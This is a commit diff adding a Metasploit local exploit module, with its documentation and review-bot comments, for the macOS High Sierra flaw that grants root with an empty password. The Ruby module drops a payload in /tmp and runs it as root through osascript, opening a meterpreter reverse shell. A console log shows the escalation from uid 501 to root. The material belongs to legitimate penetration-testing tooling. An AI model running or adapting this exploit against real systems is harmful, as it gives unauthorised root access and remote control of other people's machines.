forked from rapid7/metasploit-framework
Land rapid7#9255, add local exploit for osx root login with no password
Showing 2 changed files with 159 additions and 0 deletions.
documentation/modules/exploit/osx/local/root_no_password.md (104 additions & 0 deletions)
@@ -0,0 +1,104 @@ | ||
## Vulnerable Application | ||
This vulnerability works against OSX 10.13 (High Sierra). Early | ||
research (https://objective-see.com/blog/blog_0x24.html) suggests that | ||
the vulnerability is the result of multiple errors ultimately started by | ||
an incorrect return value from triggered by the function | ||
`od_verify_crypt_password` returning true even if the account is | ||
disabled. The subsequent function calls appear to validate and create | ||
the password, though there is still a lot of research into the bug and | ||
these results should be verified once more research has been published. | ||
|
||
## Verification Steps | ||
1. Get a session on a vulnerable system | ||
2. `use exploit/osx/local/root_no_password` | ||
3. `set lhost <IP>` | ||
4. `set lport <PORT>` | ||
5. `set session <session_id>` | ||
6. `run` | ||
|
||
## Scenarios | ||
### Example Run | ||
``` | ||
msf exploit(psexec) > use exploit/multi/handler | ||
msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp | ||
payload => osx/x64/meterpreter_reverse_tcp | ||
msf exploit(handler) > set lhost <MSF_IP> | ||
lhost => <MSF_IP> | ||
msf exploit(handler) > set lport 4567 | ||
lport => 4567 | ||
msf exploit(handler) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4567 | ||
httpserver[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <OSX_IP>:49347) at 2017-11-29 07:28:32 -0600 | ||
meterpreter > sysinfo | ||
Computer : msfusers-Mac.local | ||
OS : (MacOSX 17.0.0) | ||
Architecture : x64 | ||
Meterpreter : x64/osx | ||
meterpreter > getuid | ||
Server username: uid=501, gid=20, euid=501, egid=20 | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf exploit(handler) > use exploit/osx/local/root_no_password | ||
msf exploit(root_no_password) > show options | ||
Module options (exploit/osx/local/root_no_password): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
SESSION yes The session to run this module on. | ||
Payload options (osx/x64/meterpreter_reverse_tcp): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
LHOST yes The listen address | ||
LPORT 4444 yes The listen port | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) | ||
msf exploit(root_no_password) > set lhost <MSF_IP> | ||
lhost => <MSF_IP> | ||
msf exploit(root_no_password) > set lport 4562 | ||
lport => 4562 | ||
msf exploit(root_no_password) > set session 1 | ||
session => 1 | ||
msf exploit(root_no_password) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4562 | ||
[*] Writing payload file as '/tmp/cinbvsmrmyxw' | ||
[*] Meterpreter session 2 opened (<MSF_IP>:4562 -> <OSX_IP>:62522) at 2017-11-29 07:29:56 -0600 | ||
[*] <OSX_IP> - Meterpreter session 2 closed. Reason: Died | ||
[*] Executing payload file as '/tmp/cinbvsmrmyxw' | ||
[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target | ||
[-] Invalid session identifier: 2 | ||
msf exploit(root_no_password) > | ||
msf exploit(root_no_password) > | ||
msf exploit(root_no_password) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4562 | ||
[*] Writing payload file as '/tmp/imtjkakowanv' | ||
[*] Executing payload file as '/tmp/imtjkakowanv' | ||
[*] Meterpreter session 3 opened (<MSF_IP>:4562 -> <OSX_IP>:49348) at 2017-11-29 07:30:53 -0600 | ||
[+] Deleted /tmp/imtjkakowanv | ||
meterpreter > sysinfo | ||
Computer : msfusers-Mac.local | ||
OS : (MacOSX 17.0.0) | ||
Architecture : x64 | ||
Meterpreter : x64/osx | ||
meterpreter > getuid | ||
Server username: uid=0, gid=20, euid=0, egid=20 | ||
meterpreter > | ||
``` |
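Review bot: the sentence in the Vulnerable Application section, "an incorrect return value from triggered by the function `od_verify_crypt_password` returning true even if the account is disabled", is ungrammatical; it should read along the lines of "an incorrect return value from `od_verify_crypt_password`, which returns true even if the account is disabled". The Example Run also shows the first `run` producing a session that dies immediately ("Meterpreter session 2 closed. Reason: Died") followed by "Invalid session identifier: 2" before the second `run` succeeds; either explain why the first attempt fails or trim the transcript so readers do not take the dying session for expected behaviour. Lastly, the opening sentence says the vulnerability "works against OSX 10.13" while the module's only target is "Mac OS X 10.13.1 High Sierra x64"; the Verification Steps should state the tested version and that the initial session must be a non-root user (the transcript shows uid=501 before and uid=0 after).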
Second changed file (55 additions & 0 deletions)
@@ -0,0 +1,55 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Post::File | ||
include Msf::Exploit::EXE | ||
include Msf::Exploit::FileDropper | ||
|
||
def initialize(info={}) | ||
super(update_info(info, | ||
'Name' => 'Mac OS X Root Privilege Escalation', | ||
'Description' => %q{ | ||
This module exploits a serious flaw in MacOSX High Sierra. | ||
Any user can login with user "root", leaving an empty password. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], | ||
[ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], | ||
[ 'URL', 'https://forums.developer.apple.com/thread/79235' ], | ||
], | ||
'Platform' => 'osx', | ||
'Arch' => ARCH_X64, | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', | ||
}, | ||
'SessionTypes' => [ 'shell', 'meterpreter' ], | ||
'Targets' => [ | ||
[ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'Nov 29 2017' | ||
)) | ||
end | ||
|
||
def exploit_cmd(root_payload) | ||
"osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" | ||
end | ||
|
||
def exploit | ||
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" | ||
print_status("Writing payload file as '#{payload_file}'") | ||
write_file(payload_file, payload.raw) | ||
register_file_for_cleanup(payload_file) | ||
output = cmd_exec("chmod +x #{payload_file}") | ||
print_status("Executing payload file as '#{payload_file}'") | ||
cmd_exec(exploit_cmd(payload_file)) | ||
end | ||
end |
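Review bot: `exploit` never checks whether the osascript authentication succeeded: `cmd_exec(exploit_cmd(payload_file))` discards its output, so on a host where root already has a password set the module prints "Executing payload file" and then silently produces no session. Capture that output, `fail_with(Failure::NotVulnerable, ...)` when it contains an authentication error, and add a `check` method so an operator can test the condition before dropping a payload on disk. Smaller points: `output = cmd_exec("chmod +x #{payload_file}")` assigns a variable that is never read (either drop the assignment or verify the chmod succeeded before executing); `Rex::Text::rand_text_alpha_lower(12)` calls a method with `::` where the framework's style is `Rex::Text.rand_text_alpha_lower(12)`; and the `Description` says "MacOSX High Sierra" generally while `Targets` lists only 10.13.1, so the description should name the affected version explicitly.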